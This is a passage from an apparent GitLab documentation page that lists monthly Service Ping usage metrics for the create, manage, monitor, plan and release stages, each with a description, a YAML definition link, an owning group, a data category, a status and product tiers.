definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180731_projects_imported_from_github.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage_monthly.create.projects_with_disable_overriding_approvers_per_merge_request` + +Count of the number of projects with setting to disable overriding approvers per merge request + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175057_projects_with_disable_overriding_approvers_per_merge_request.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.create.projects_with_repositories_enabled` + +Count of users creating projects that have a matching Git repository, result of a Git push action, for last 28 days. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216182049_projects_with_repositories_enabled.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.create.projects_with_sectional_code_owner_rules` + +Count of projects using code owners with code owners section feature + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216182045_projects_with_sectional_code_owner_rules.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.create.projects_without_disable_overriding_approvers_per_merge_request` + +Count of the number of projects without setting to disable overriding approvers per merge request + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175059_projects_without_disable_overriding_approvers_per_merge_request.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.create.protected_branches` + +Count of users creating projects with repositories making use of at least one protected branch in last 28 days. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216182051_protected_branches.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.create.remote_mirrors` + +Count of users creating projects with remote mirrors. Includes both push and pull mirrors. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216182038_remote_mirrors.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.create.snippets` + +Count of distinct author_id from snippets for last 28 days + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180317_snippets.yml) + +Group: `group::editor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.create.suggestions` + +Count of unique users per month who create suggestions in merge request comments + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175109_suggestions.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.create.total_number_of_locked_files` + +The total number of files which have been locked via the GitLab UI + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216183614_total_number_of_locked_files.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.create.total_number_of_path_locks` + +Number of paths/directories manually locked through the UI + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216183613_total_number_of_path_locks.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.create.users_using_lfs_locks` + +Number of unique users who have locked files or directories using LFS via the command line + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216182054_users_using_lfs_locks.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.create.users_using_path_locks` + +Number of users creating path_locks in last 28 days. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216182053_users_using_path_locks.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.enablement.geo_secondary_web_oauth_users` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210427213346_geo_secondary_web_oauth_users.yml) + +Group: `` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.manage.bulk_imports.gitlab` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183640_gitlab.yml) + +Group: `` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free` + +### `usage_activity_by_stage_monthly.manage.bulk_imports.gitlab_v1` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183642_gitlab_v1.yml) + +Group: `` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage_monthly.manage.compliance_frameworks_with_pipeline` + +Count of compliance frameworks that have a pipeline configuration + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210622091519_compliance_frameworks_with_pipeline.yml) + +Group: `compliance` + +Data Category: `Optional` + +Status: `implemented` + +Tiers: `ultimate` + +### `usage_activity_by_stage_monthly.manage.custom_compliance_frameworks` + +Monthly count of all custom compliance framework labels + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210507165054_custom_compliance_frameworks.yml) + +Group: `compliance` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.manage.events` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180814_events.yml) + +Group: `group::manage` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage_monthly.manage.group_imports.gitlab_migration` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183711_gitlab_migration.yml) + +Group: `` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage_monthly.manage.group_imports.group_import` + +Number of group import states + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183709_group_import.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.manage.group_saml_enabled` + +Whether group SAML is enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/settings/20210216180833_group_saml_enabled.yml) + +Group: `group:access` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.manage.groups` + +Number of users who are group members for last 28 days + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180816_groups.yml) + +Group: `group::access` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.manage.groups_imported` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183737_groups_imported.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free` + +### `usage_activity_by_stage_monthly.manage.issue_imports.csv` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183707_csv.yml) + +Group: `` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage_monthly.manage.issue_imports.fogbugz` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183703_fogbugz.yml) + +Group: `` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage_monthly.manage.issue_imports.jira` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183701_jira.yml) + +Group: `` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage_monthly.manage.issue_imports.phabricator` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183705_phabricator.yml) + +Group: `` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage_monthly.manage.issues_imported.csv` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183735_csv.yml) + +Group: `` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free` + +### `usage_activity_by_stage_monthly.manage.issues_imported.fogbugz` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183731_fogbugz.yml) + +Group: `` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free` + +### `usage_activity_by_stage_monthly.manage.issues_imported.jira` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183730_jira.yml) + +Group: `` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free` + +### `usage_activity_by_stage_monthly.manage.issues_imported.phabricator` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183733_phabricator.yml) + +Group: `` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free` + +### `usage_activity_by_stage_monthly.manage.ldap_admin_sync_enabled` + +Whether LDAP admin sync is enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/settings/20210216180831_ldap_admin_sync_enabled.yml) + +Group: `group::access` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.manage.ldap_group_sync_enabled` + +Has the instance configured [LDAP Group Sync](https://docs.gitlab.com/ee/administration/auth/ldap/#group-sync) + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/settings/20210216180829_ldap_group_sync_enabled.yml) + +Group: `group::acess` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.manage.ldap_keys` + +Number of users creating keys synced as part of LDAP for last 28 days. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216180820_ldap_keys.yml) + +Group: `group::acess` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.manage.ldap_servers` + +Number of LDAP servers configured + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216180827_ldap_servers.yml) + +Group: `group::manage` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.manage.ldap_users` + +Number of users that are linked to LDAP + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216180822_ldap_users.yml) + +Group: `group::access` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.manage.omniauth_providers` + +Number of unique user logins using an OmniAuth provider + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183627_omniauth_providers.yml) + +Group: `group::access` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.manage.project_imports.bitbucket` + +Count of projects imported from Bitbucket + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183650_bitbucket.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.manage.project_imports.bitbucket_server` + +Count of projects imported from Bitbucket Server + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183652_bitbucket_server.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.manage.project_imports.git` + +Count of projects imported from Git + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183655_git.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.manage.project_imports.gitea` + +Count of projects imported from Gitea + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183653_gitea.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.manage.project_imports.github` + +Count of projects imported from GitHub + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183648_github.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.manage.project_imports.gitlab` + +Count of projects imported from GitLab using Project Export/Import + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183646_gitlab.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.manage.project_imports.gitlab_migration` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183659_gitlab_migration.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.manage.project_imports.gitlab_project` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183644_gitlab_project.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.manage.project_imports.manifest` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183657_manifest.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.manage.project_imports.total` + +Total count of projects imported + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210520111133_total.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `implemented` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.manage.projects_imported.bitbucket` + +Count of projects imported from Bitbucket + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183720_bitbucket.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.manage.projects_imported.bitbucket_server` + +Count of projects imported from Bitbucket Server + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183722_bitbucket_server.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.manage.projects_imported.git` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183726_git.yml) + +Group: `` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free` + +### `usage_activity_by_stage_monthly.manage.projects_imported.gitea` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183724_gitea.yml) + +Group: `` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free` + +### `usage_activity_by_stage_monthly.manage.projects_imported.github` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183718_github.yml) + +Group: `` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free` + +### `usage_activity_by_stage_monthly.manage.projects_imported.gitlab` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183716_gitlab.yml) + +Group: `` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free` + +### `usage_activity_by_stage_monthly.manage.projects_imported.gitlab_project` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183714_gitlab_project.yml) + +Group: `` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free` + +### `usage_activity_by_stage_monthly.manage.projects_imported.manifest` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183728_manifest.yml) + +Group: `` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free` + +### `usage_activity_by_stage_monthly.manage.projects_imported.total` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183712_total.yml) + +Group: `` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free` + +### `usage_activity_by_stage_monthly.manage.projects_with_compliance_framework` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216180825_projects_with_compliance_framework.yml) + +Group: `group::manage` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: + +### `usage_activity_by_stage_monthly.manage.unique_users_all_imports` + +Number of users from projects imported + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183638_unique_users_all_imports.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.manage.user_auth_by_provider.google_oauth2` + +Number of unique user logins using Google OAuth authentication + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183636_google_oauth2.yml) + +Group: `group::access` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.manage.user_auth_by_provider.standard` + +Number of unique user logins using password authentication + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183634_standard.yml) + +Group: `group::access` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.manage.user_auth_by_provider.two-factor` + +Number of unique user logins using two factor authentication + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183629_two-factor.yml) + +Group: `group::access` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.manage.user_auth_by_provider.two-factor-via-u2f-device` + +Number of unique user logins using two factor via a U2F device + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183631_two-factor-via-u2f-device.yml) + +Group: `group::access` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.manage.user_auth_by_provider.two-factor-via-webauthn-device` + +Number of unique user logins using two factor via a WebAuthn device + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183633_two-factor-via-webauthn-device.yml) + +Group: `group::access` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.manage.users_created` + +Number of users created in the month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180818_users_created.yml) + +Group: `group::access` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.manage.value_stream_management_customized_group_stages` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216180824_value_stream_management_customized_group_stages.yml) + +Group: `group::manage` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: + +### `usage_activity_by_stage_monthly.monitor.clusters` + +Count users creating clusters in last 28 days. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180956_clusters.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.monitor.clusters_applications_prometheus` + +Users creating clusters with Prometheus enabled in last 28 days. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180958_clusters_applications_prometheus.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.monitor.operations_dashboard_default_dashboard` + +Active users with enabled operations dashboard + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181000_operations_dashboard_default_dashboard.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.monitor.operations_dashboard_users_with_projects_added` + +Active users with projects on operations dashboard + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181006_operations_dashboard_users_with_projects_added.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.monitor.projects_incident_sla_enabled` + +Count of projects with Incident SLA enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216183753_projects_incident_sla_enabled.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.monitor.projects_with_alert_incidents` + +Count of unique projects with an incident from an alert created in the last month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180526_projects_with_alert_incidents.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.monitor.projects_with_error_tracking_enabled` + +Count of users creating projects with error tracking enabled. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181004_projects_with_error_tracking_enabled.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.monitor.projects_with_incidents` + +Count of unique projects with an incident created in the last month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180524_projects_with_incidents.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.monitor.projects_with_tracing_enabled` + +Projects with tracing enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181002_projects_with_tracing_enabled.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.package.projects_with_packages` + +The total number of projects in a given month with at least one package + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181057_projects_with_packages.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.plan.assignee_lists` + +Count of MAU creating assignee lists on Boards + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216181156_assignee_lists.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.plan.epics` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181158_epics.yml) + +Group: `group::plan` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage_monthly.plan.issues` + +Count of users creating Issues in last 28 days. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181139_issues.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.plan.label_lists` + +Count of MAU creating label lists on Boards + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181200_label_lists.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.plan.milestone_lists` + +Count of MAU created milestone lists on Boards + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216181201_milestone_lists.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.plan.notes` + +Count of MAU commenting on an issuable + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181141_notes.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.plan.projects` + +Count of MAU creating projects + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181143_projects.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.plan.projects_jira_active` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181150_projects_jira_active.yml) + +Group: `group::plan` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage_monthly.plan.projects_jira_dvcs_cloud_active` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181152_projects_jira_dvcs_cloud_active.yml) + +Group: `group::plan` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage_monthly.plan.projects_jira_dvcs_server_active` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181154_projects_jira_dvcs_server_active.yml) + +Group: `group::plan` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage_monthly.plan.service_desk_enabled_projects` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181147_service_desk_enabled_projects.yml) + +Group: `group::plan` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage_monthly.plan.service_desk_issues` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181148_service_desk_issues.yml) + +Group: `group::plan` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage_monthly.plan.todos` + +Count of MAU creating todos + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181145_todos.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.release.deployments` + +Unique users triggering deployments + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181935_deployments.yml) + +Group: `group::release` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage_monthly.release.failed_deployments` + +Total failed deployments + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181937_failed_deployments.yml) + +Group: `group::release` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage_monthly.release.projects_mirrored_with_pipelines_enabled` + +Count creator_id from projects with repository mirroring enabled. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216181943_projects_mirrored_with_pipelines_enabled.yml) + +Group: `group::pipeline execution` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.release.releases` + +Unique users creating release tags + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181939_releases.yml) + +Group: `group::release` + +Data 